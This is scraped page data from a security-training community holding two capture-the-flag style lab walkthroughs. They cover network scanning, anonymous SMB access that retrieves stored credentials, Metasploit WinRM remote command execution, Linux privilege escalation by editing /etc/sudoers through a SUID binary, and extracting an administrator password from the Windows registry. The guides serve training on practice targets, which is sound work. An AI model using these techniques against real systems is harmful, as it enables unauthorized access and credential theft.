images/bS0xMjY2LXRBUWhNRw?revision=7","title":"eec1c9d0-feab-44b3-b9d2-5f32316e0eaf.jpg","associationType":"COVER","width":800,"height":800,"altText":""},"BlogTopicMessage:message:1266":{"__typename":"BlogTopicMessage","subject":"Human Connection Challenge: Season 1 – Scanning Walkthrough Guide (Official Version)","conversation":{"__ref":"Conversation:conversation:1266"},"id":"message:1266","entityType":"BLOG_ARTICLE","eventPath":"category:blogs/community:dnvaw96485board:the-human-connection-blog/message:1266","revisionNum":7,"uid":1266,"depth":0,"board":{"__ref":"Blog:board:the-human-connection-blog"},"author":{"__ref":"User:user:516"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":"","introduction":"","metrics":{"__typename":"MessageMetrics","views":1048},"postTime":"2024-12-23T02:02:07.465-08:00","lastPublishTime":"2025-02-19T02:16:15.460-08:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" Time’s Up! Congratulations to everyone who completed Lab 2: Scanning from the Human Connection Challenge: Season 1. \n In this walkthrough, I'll share some strategies for efficiently completing the lab, based on my perspective as the author. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine! The goal is to learn, and I hope these notes help clarify any steps and reinforce key concepts for the next challenge. \n This challenge has now ended, but the lab remains available for practice. While prizes are no longer up for grabs, you can still complete the lab and use this walkthrough guide for support if needed. \n I’ve also used placeholders in some of the commands that would give away an answer directly, so if you see anything enclosed in angle brackets, such as <name server>, please make sure you replace it with the actual value, such as nameserver. \n With all that considered, let's get started. \n Overview \n Task: Identify the name server records of tinytown.bitnet. \n 1. What is the IP of the first name server for tinytown.bitnet? \n You’ll first need to open a Terminal on the Kali desktop. Next, you’ll need to query the DNS Server IP (found in the Machines panel) about the tinytown.bitnet domain using the nslookup (Name Server Lookup) tool. \n You’re specifically looking for NS (Name Server) records, so you can use the -type=ns parameter with nslookup to specify this: \n nslookup -type=ns tinytown.bitnet [DNS Server IP] \n The output of this command will return two name servers for the domain labelled with 1 and 2. \n Your next step is to identify what IP address is associated with the first name server (1). To do this, you can use nslookup along with the name server, domain, and DNS Server IP: \n nslookup <name server>1.tinytown.bitnet [DNS Server IP] \n This command will then return an IP address for the name server. \n 2. What is the IP of the second name server for tinytown.bitnet? \n As you’ve already identified both name servers, you’ll just need to run the previous command, except with the second (2) name server: \n nslookup <name server>2.tinytown.bitnet [DNS Server IP] \n You’ll then find the IP address associated with it. \n Task: Identify port service information for Target 1. \n 3. What service version is running on port 53? \n A network scanning tool like Nmap can help you identify the service version running on a specific port. To do this with Nmap, you can use the -sV option for service detection: \n nmap -sV [Target 1 IP Address] \n The output will show what service version is running on port 53. \n 4. What is the full service banner of port 22? \n There are a couple of ways to find the full service banner of port 22 – such as with Nmap or Netcat. \n If you’re using Nmap, you can modify the previous command to include the “banner” script along with the port number: \n nmap -sV -script=banner [Target 1 IP Address] -p22 \n The command line will then display the service banner from port 22. \n You can alternatively use netcat to manually connect to the SSH server. When a client connects, Netcat may present a banner that contains version information. \n To use Netcat, you’ll need the nc command along with the Target 1 IP address and specify you want to connect to port 22: \n nc [Target 1 IP Address] 22 \n When you run this command, the banner appears before the terminal hangs. \n Task: Identify a token on one of the ports. \n 5. What is the token? \n With the previous Nmap command, you initially found that three ports were open on Target 1. However, you’ll need to do a more thorough network scan to find another open port, one not initially found with the previous scans. \n To do this, you can expand your port scan to cover a much wider range by using Netcat to scan for open ports from 1 through 9000: \n nc -zvn <Target 1 IP Address> 1-9000 \n Here, -z will scan for listening services but won’t send any data, -v is verbose mode, which provides more detailed information, and -n tells Netcat not to resolve hostnames via DNS. \n This command will reveal a fourth open port. Now, you can use Netcat to connect to this port: \n nc <Target 1 IP Address> <open port> \n The token will then be displayed in the terminal. \n Task: Scan the TLS configuration on Target 2. \n 6. How many protocols are enabled? \n To scan for SSL/TLS configurations, you can use the sslscan tool. By default, sslscan scans port 443 and will return supported server ciphers, certificate details, and more. \n You can use sslscan like this: \n sslscan <Target 2 IP Address> \n The returned output will be verbose, but you can find and count the number of enabled protocols under the SSL/TLS Protocols subheading. \n 7. Name an enabled protocol. \n Using the previous output, name one of the enabled protocols. \n 8. What exploit are the protocols NOT vulnerable to? \n Using the same output, scroll down through the results until you find a subheading that’s named after a vulnerability and contains a similar string to: \n <Protocol> not vulnerable to <vulnerability name> \n The vulnerability has the same name as the subheading. \n Task: Identify and extract information from an SMB share on Target 3. \n 9. What Disk shared directory can you access? \n To extract information from an SMB (Server Message Block) share, you can use the smbclient tool. \n First, you’ll need to list the SMB shares on the target using the -L flag (the list/lookup option) with: \n smbclient -L //<Target 3 IP> \n You’ll then be prompted for a password, but you can press Enter to skip this. \n A list of SMB shares will then be displayed, three of which are shown to be a Disk type, so you know the answer will be one of these. \n You can now begin to go through the list and try to connect to the shares with: \n smbclient //<Target 3 IP>/<Sharename> \n However, this time when you’re prompted for a password and you press Enter, you might encounter a message when you try and connect to a share: \n NT_STATUS_ACCESS_DENIED \n If you attempt to connect to all shares, you’ll find you can connect to one share without a password. You’ll then be greeted with the following prompt to show the successful connection: \n smb: \\> \n 10. What is the token stored in the directory? \n Now that you’re connected, you can execute commands to interact with the SMB share. If you run ls, you’ll find a token.txt file in the current directory. \n You can then download the file from the share onto your local machine with: \n get token.txt \n On the Kali desktop, open the Home folder and the token.txt will be inside. Open this file and find the token. \n 11. What is the username stored in the directory? \n After you’ve run ls in the SMB share, you’ll find not only token.txt, but also a file named creds.txt. \n Use the same command as you just did previously to download the file onto your machine: \n get creds.txt \n This file will also be downloaded to the Home folder, where you can find a username and password. \n Task: Identify open services on Target 3. \n Task: Connect to Target 3 with the previously found credentials. \n 12. What is the token stored in the user's /Documents directory? \n For this final task, you first need to scan the target using Nmap. \n You’ll find that if you attempt to scan the target without using the -Pn flag, you’ll get a response saying that the host seems down. However, if you run Nmap with -Pn, you’ll find some ports are open: \n nmap -Pn <Target 3 IP Address> \n However, the ports returned from this command don’t offer a way to connect to the target. \n You’ll also need to scan the 6000 most popular ports: \n nmap -Pn --top-ports 6000 <Target 3 IP Address> \n These results will now show two additional ports are open regarding the Web Services Management (Wsman) protocol, which is used to communicate with remote machines and execute commands. \n One of the tools that implement this protocol is Windows Remote Management (WinRM) which is Microsoft’s implementation of Wsman. \n Knowing this, you can now use Metasploit to interact with the target. In your terminal, run: \n msfconsole \n Once loaded, you can use the the following auxiliary module to connect to a system with WinRm enabled and execute a command with: \n set cmd ls \n You’ll then need to set the following options, using the credentials you found in the creds.txt file: \n set username <username>\nset password <password>\nset rhosts <Target 3 IP Address> \n Next, you need to set the cmd option with the command you want to run. If you use the ls command, you’ll be able to find what out files are in the directory you connect to: \n set cmd ls \n With all the options set, you can now run the module: \n run \n The results of the executed command will be printed on the screen and also saved to a directory, but both show the existence of a token.txt file in the current directory. \n You can now set the cmd option to type token.txt in Metasploit: \n set cmd type token.txt \n Once set, use the run command to send the updated command: \n run \n The contents of token.txt will then be displayed on the screen and outputted to a file. \n Tools \n For this challenge, you’ll use a range of tools including: \n \n \n Nslookup \n Nmap \n Netcat \n Sslscan \n Smbclient \n Metasploit \n \n Tips \n You can use different tools and parameters within those tools to scan for and find information, so don’t be afraid to try out a few different things! \n If you want to learn more about some of the tools within this lab, take a look at the following collections: \n \n Reconnaissance \n Nmap \n Infrastructure Hacking \n Introduction to Metasploit \n Post Exploitation with Metasploit \n \n Conclusion \n The steps I’ve laid out here aren’t the only way to find the answers to the questions, as long as you find the answer, you did it – well done! \n If you found another way to find some of these answers and think there’s a better way to do it, please post them in the comments below! \n I hope you enjoyed the challenge and I’ll see you for the next one. ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"10202","kudosSumWeight":4,"repliesCount":4,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMjY2LXRBUWhNRw?revision=7\"}"}}],"totalCount":1,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMjY2LXRBUWhNRw?revision=7"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"Conversation:conversation:1066":{"__typename":"Conversation","id":"conversation:1066","topic":{"__typename":"BlogTopicMessage","uid":1066},"lastPostingActivityTime":"2024-12-05T01:50:08.199-08:00","solved":false},"Blog:board:cyber-countdown":{"__typename":"Blog","id":"board:cyber-countdown","displayId":"cyber-countdown","nodeType":"board","conversationStyle":"BLOG","title":"Cyber Countdown","shortTitle":"Cyber Countdown","parent":{"__ref":"Category:category:welcome"}},"User:user:5":{"__typename":"User","uid":5,"login":"KieranRowley","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS01LVVrdjlHeQ?image-coordinates=0%2C384%2C3024%2C3408"},"id":"user:5"},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMDY2LXpxU0MxNg?revision=4\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMDY2LXpxU0MxNg?revision=4","title":"social tile_3200x2000.png","associationType":"COVER","width":3200,"height":2000,"altText":""},"BlogTopicMessage:message:1066":{"__typename":"BlogTopicMessage","subject":"Cyber Countdown: Day 4","conversation":{"__ref":"Conversation:conversation:1066"},"id":"message:1066","entityType":"BLOG_ARTICLE","eventPath":"category:welcome/community:dnvaw96485board:cyber-countdown/message:1066","revisionNum":4,"uid":1066,"depth":0,"board":{"__ref":"Blog:board:cyber-countdown"},"author":{"__ref":"User:user:5"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":" Throughout December we are unwrapping, fresh content, celebrating this year’s successes, and gifting you with the tools and insight you need to be ready for 2025. \n Today's Lab is Return to Haunted Hollow: Haunted Helpdesk and today's Sim is The Flashpoint Podcast – Orchid Investments. ","introduction":"Throughout December we are unwrapping, fresh content, celebrating this year’s successes, and gifting you with the tools and insight you need to be ready for 2025.","metrics":{"__typename":"MessageMetrics","views":89},"postTime":"2024-11-15T07:21:19.203-08:00","lastPublishTime":"2024-12-05T01:50:08.199-08:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" Lab of the Day \n Every day we’re revisiting a standout lab from the past year—highlighting its impact and the skills it helped build, whilst also introducing you to the experts who built it. \n Today's recommendation is another from our Spooky October Series: Return to Haunted Hollow: Haunted Helpdesk which comes from NyePrior, Lead Cyber Security Engineer here at Immersive Labs. \n Nye chose this lab simply because they love the whole collection, but as they were limited to choosing one lab, they chose the one that they wrote! \n On this lab, Nye remarked: \n \n “I love a challenge lab that gives you the chance to explore without guide rails, and this lab is intended to be a challenge with multiple different ways of completing it. Depending on your experience or skills, you can complete the lab in different ways.” \n \n CyberPro licence holders can find the lab in Exercise > Challenges & Scenarios > Return to Haunted Hollow \n Crisis Sim of The Day \n Throughout December, JonPaulGabriele, Crisis Sim Lead, will be releasing 5 new Crisis Sim Scenarios. Today’s Sim is The Flashpoint Podcast – Orchid Investments. \n About this Sim, JP said: \n \n “This is probably my favorite crisis sim this year! It’s written as a podcast episode that takes you back to a crisis, but then puts you right in the middle of it to make the choices that will shape the outcome. This isn’t just an exercise, it’s also a training sim because it explains the complexities of managing a crisis as you go along. I hope people enjoy running it as much as I did creating it!” \n \n Crisis Sim licence holders can find the sim in Exercise > Crisis Sim > Scenario Catalogue > The Flashpoint Podcast – Orchid Investments. \n Don't forget! JP will also be running a festive crisis sim event on 13th December. \n 🔔 Don’t miss out – we are dropping fresh new content throughout December. Make sure you're following the COUNTDOWN Tag to get notified as soon as each one is released. ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"2000","kudosSumWeight":2,"repliesCount":0,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMDY2LXpxU0MxNg?revision=4\"}"}}],"totalCount":1,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"videos":{"__typename":"VideoConnection","edges":[],"totalCount":0,"pageInfo":{"__typename":"PageInfo","hasNextPage":false,"endCursor":null,"hasPreviousPage":false,"startCursor":null}},"coverImage":{"__typename":"UploadedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMDY2LXpxU0MxNg?revision=4"},"coverImageProperties":{"__typename":"CoverImageProperties","style":"STANDARD","titlePosition":"BOTTOM","altText":""}},"Conversation:conversation:1107":{"__typename":"Conversation","id":"conversation:1107","topic":{"__typename":"BlogTopicMessage","uid":1107},"lastPostingActivityTime":"2024-12-03T08:06:02.080-08:00","solved":false},"User:user:519":{"__typename":"User","uid":519,"login":"udhav","registrationData":{"__typename":"RegistrationData","status":null},"deleted":false,"avatar":{"__typename":"UserAvatar","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/dS01MTktekt4U2U4?image-coordinates=191%2C0%2C3903%2C3712"},"id":"user:519"},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWhJQ0FCVA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWhJQ0FCVA?revision=6","title":"eec1c9d0-feab-44b3-b9d2-5f32316e0eaf.jpg","associationType":"COVER","width":800,"height":800,"altText":""},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUdFSjFySA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUdFSjFySA?revision=6","title":"image.png","associationType":"BODY","width":1278,"height":766,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows system information dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LW45N0RBUw?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LW45N0RBUw?revision=6","title":"image.png","associationType":"BODY","width":1123,"height":672,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows Computer Management dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUVmZDd0Zg?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUVmZDd0Zg?revision=6","title":"image.png","associationType":"BODY","width":1123,"height":672,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows Local Users & Groups dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWQ4bmg1ZA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWQ4bmg1ZA?revision=6","title":"image.png","associationType":"BODY","width":1121,"height":627,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows Local Users & Groups dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LU53UXZvTg?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LU53UXZvTg?revision=6","title":"image.png","associationType":"BODY","width":1122,"height":617,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows Registry Editor dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LVhtcGEzRA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LVhtcGEzRA?revision=6","title":"image.png","associationType":"BODY","width":1122,"height":548,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows Command Prompt open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LXhxRURtdQ?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LXhxRURtdQ?revision=6","title":"image.png","associationType":"BODY","width":1197,"height":675,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows User Account Control dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LTRxZmw0eA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LTRxZmw0eA?revision=6","title":"image.png","associationType":"BODY","width":1124,"height":674,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows File System dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUhTZ3RySw?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUhTZ3RySw?revision=6","title":"image.png","associationType":"BODY","width":1125,"height":673,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows File System dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LXFBTmtiTA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LXFBTmtiTA?revision=6","title":"image.png","associationType":"BODY","width":1122,"height":671,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows Users & Groups dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LTlvbTlWcA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LTlvbTlWcA?revision=6","title":"image.png","associationType":"BODY","width":1126,"height":672,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows Users & Groups dialog open."},"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWozWnRtRA?revision=6\"}":{"__typename":"AssociatedImage","url":"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWozWnRtRA?revision=6","title":"image.png","associationType":"BODY","width":1123,"height":674,"altText":"A screenshot of a virtual machine running on Kali Linux, with a Windows File System dialog open."},"BlogTopicMessage:message:1107":{"__typename":"BlogTopicMessage","subject":"The Human Connection Challenge\nLab 1: Basic OS Skills – Walkthrough Guide (Community Version)","conversation":{"__ref":"Conversation:conversation:1107"},"id":"message:1107","entityType":"BLOG_ARTICLE","eventPath":"category:blogs/community:dnvaw96485board:the-human-connection-blog/message:1107","revisionNum":6,"uid":1107,"depth":0,"board":{"__ref":"Blog:board:the-human-connection-blog"},"author":{"__ref":"User:user:519"},"teaser@stripHtml({\"removeProcessingText\":true,\"truncateLength\":-1})":" This is a walkthrough guide written by one of our community members, who offered to give their perspective on the challenge. Interestingly, they approached this challenge by completing some of the tasks in the graphical user interface (GUI) instead of the command line. ","introduction":"","metrics":{"__typename":"MessageMetrics","views":813},"postTime":"2024-11-25T02:02:20.483-08:00","lastPublishTime":"2024-11-25T02:02:20.483-08:00","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})":" Congratulations to everyone who completed Lab 1: Basic OS Skills from the Human Connection Challenge: Season 1. \n This is a walkthrough guide written by one of our community members, udhav, who offered to give their perspective on the challenge. Interestingly, udhav approached this challenge by completing some of the tasks in the graphical user interface (GUI) instead of the command line. \n This isn’t the official walkthrough but one user’s interpretation. Remember, there are often multiple ways to approach a challenge, so if you used a different method and succeeded, that's perfectly fine. The goal is to learn! \n Check out the official walkthrough guide here. \n We’ve redacted some of the answers to avoid any spoilers! We’ve also used placeholders in some of the commands that would give away an answer directly, so if you see anything enclosed in angle brackets, such as <filename>, make sure you replace it with the actual value, such as example.txt. \n Over to you udhav... \n Questions \n Question 1: What is the token inside ssh-token.txt? \n Use the given credentials to log into Target 1. There you will find ssh-token.txt. \n Question 2: What is the UID of the user? \n Type the command id to get the UID of the current user. \n Question 3: What command can the user run as root? \n Type the sudo -l command. This will list the user's privileges and check what specific commands the user can run as root. \n Question 4: What is the status of the screen-cleanup service? \n Use the systemctl utility to check the status of any service. Type the command: \n systemctl status <Service-Name> \n Question 5: What is the decoded filename? In the same directory, we are given another file start-here.txt, which contains a Base64-encoded string. Use the base64 utility (which comes pre-installed in the Linux distribution) with the flag -d in order to decode the string. \n echo “encode-string” | base64 -d \n Question 6: Find the decoded file on the system. The decoded string we got in the previous question will give us the name of a file. To find that file on the system use find and grep. \n find / | grep \"<decoded-string>\" \n Question 7: What is the string within the file? Once you locate the binary, you can use strings to display all the strings that a binary contains. \n strings < path-to-the-binary > \n Question 8: Find a filename that contains the string. To find the file containing the string from the previous question on the system, use find and grep. \n find / | grep \"< string >\" \n Question 9: What is the token inside the file? Run cat on that file to get the token. \n cat <path-to-the-file/filename> \n Question 10: Identify a binary with SUID permissions enabled that is vulnerable. To find out the binaries with SUID permissions, type the command: \n find / -type f -perm -u=s 2>/dev/null | xargs ls -lah \n \n Find /: This will find in the root directory traversing every directory present \n -type f: This will limit the results to files only. This will exclude the directories. \n -perm -u=s: This checks for the files that have an SUID bit set to ‘s’. \n 2>/dev/null: This will redirect any error to the /dev/null for clean output. \n | xargs: This will pipe out the results for the command before | and will provide it to the xargs. \n ls -lah: This will list all the files with their permissions and modified dates. \n \n \n This command will return five binaries. Explore each one to find out which one is vulnerable. \n Question 11: What date was the binary file last modified? \n You can find the answer to this question using the command in the previous question. \n SUID is a special permission where we can execute a command with the owner’s privileges. So, we can execute the vulnerable binary with root privileges. \n Privilege escalation \n For privilege escalation, we have found a binary with root privileges. \n Methodology: \n We can edit the /etc/sudoers file: \n <binary> /etc/sudoers \n Give root permissions to our current user. \n lucy ALL=(ALL:ALL) ALL \n Then, we can switch to the root user. \n To switch users, type the command sudo su. \n Question 12: What is the token inside /root/escalated.txt? \n Navigate to the /root folder. There you can see the file escalated.txt. \n In this file you are given the last token for the Linux system and the credentials for the Windows machine, to which you have to connect through RDP. \n Windows Machine \n Use the credentials extracted from the Linux system to connect to the Windows machine. The Target 2 IP is given. \n To connect to the Windows machine we will use the xfreerdp tool. \n xfreerdp /u:USERNAME /p:PASSWORD /cert:ignore /v:<WINDOWS-IP> \n Question 13: What is the computer name? \n After connecting successfully, open Control Panel and click System and Security > System. You can find the details of the Windows machine here. \n \n \n Question 14: What is the OS version? Use the steps mentioned in the previous question to find the OS version. \n Question 15: What is the user's RID? Run the command whoami /all. The RID is the last four digits of the SID. \n Question 16: What is the name of the service with the display name (also known as the caption) “Security Center”? To see the list of services, open Computer Management > Services and Application. Here you can find all the services. \n \n \n Question 17: What user is a member of the “Sales” group? Click Computer Management > System Tools > Local Users & Groups. Here you can check all the Users & Groups details. \n \n \n Question 18: Other than Users, what group is the user Fred a member of? Inside the Users folder, in Computer Management > System Tools > Local Users & Groups, by double-clicking on the user, we can analyze the participation of each user in different groups. \n \n \n Question 19: Identify a set of administrator credentials in the Windows registry. Press the Windows key + r, then type regedit. Open the Windows registry. Press CTRL + F. Search for the string \"administrator\" Press F3 until you get the password. \n \n \n Or, a quicker way is to use the command prompt to search for the password. You can use a registry query for that. \n \n Open cmd and run the following command: \n \n reg query HKLM /f \"administrator\" /s /t REG_SZ \n \n HKLM is the registry hive where we have to search for the string. \n /f is used to find the pattern. \n \"administrator\" is the pattern to identify. \n /s is for recursive search. \n /t is the type of file we are looking for, like REG_SZ. \n \n \n \n Question 20: What is the user's password? You can find the admin password in the registry from the previous question. \n Question 21: What is the token inside the user's home directory? If you try to open C:\\Users\\<administrator user>, a dialogue box will open asking for the administrator’s password, which we found in the registry. Entering that password gives us access to the user’s folder, where the tokens for this task and future tasks reside. \n \n \n Question 22: Add a new user, Chase, to the system. The file user-token.txt will be created in your current user’s home directory once you've done this. To add a new user to the system: Open Control Panel > User Accounts > User Accounts > Manage another account. You will have to enter the admin’s username and password again here. Then click Add a user account. Enter a username, password, and password hint for the new user. After adding a user, repeat the steps mentioned in the previous question to see the user-token.txt file. \n \n \n Question 23: Add the user Chase to the group Marketing. The file group-token.txt will be created in your current user’s home directory once you've done this. For this, open Computer Management with administrator privileges. Run as administrator and go to System Tools > Local User & Groups > Groups. Select the Marketing group, and add Chase to it. \n \n \n Question 24: What is the token inside group-token.txt? Repeat the steps mentioned in Question 21. You will find group-token.txt. \n \n My key takeaways: \n \n Exploring the Windows registry: This challenge provided valuable hands-on experience with the Windows Registry. I gained a deeper understanding of the registry’s structure, its role in system and application settings, and how specific keys can influence system behavior. This knowledge enhanced my troubleshooting skills, especially for scenarios where configuration issues impact system performance or application functionality. \n Linux privilege escalation using SUID-permitted commands: SUID-enabled editors can be exploited to gain root by modifying the sudoers file. This highlights the need to audit SUID permissions on such binaries to prevent unauthorized privilege escalation. \n Windows user management \n Connecting to Windows using RDP \n \n Thank udhav! \n Remember, this is just one interpretation of how to solve this challenge. To understand how the author intended this challenge to be completed, check out the official walkthrough guide here. \n Please join me in thanking udhav for this comprehensive walkthrough in the comments below. ","body@stripHtml({\"removeProcessingText\":true,\"removeSpoilerMarkup\":true,\"removeTocMarkup\":true,\"truncateLength\":-1})@stringLength":"9260","kudosSumWeight":2,"repliesCount":1,"readOnly":false,"images":{"__typename":"AssociatedImageConnection","edges":[{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDE","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWhJQ0FCVA?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDI","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUdFSjFySA?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDM","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LW45N0RBUw?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDQ","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUVmZDd0Zg?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDU","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LWQ4bmg1ZA?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDY","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LU53UXZvTg?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDc","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LVhtcGEzRA?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDg","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LXhxRURtdQ?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDk","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LTRxZmw0eA?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEw","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LUhTZ3RySw?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEx","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LXFBTmtiTA?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEy","node":{"__ref":"AssociatedImage:{\"url\":\"https://community.immersivelabs.com/t5/s/dnvaw96485/images/bS0xMTA3LTlvbTlWcA?revision=6\"}"}},{"__typename":"AssociatedImageEdge","cursor":"MjUuNHwyLjF8b3wyNXxfTlZffDEz","node":{"__ref":"AssociatedImage:{\"url\":\"https://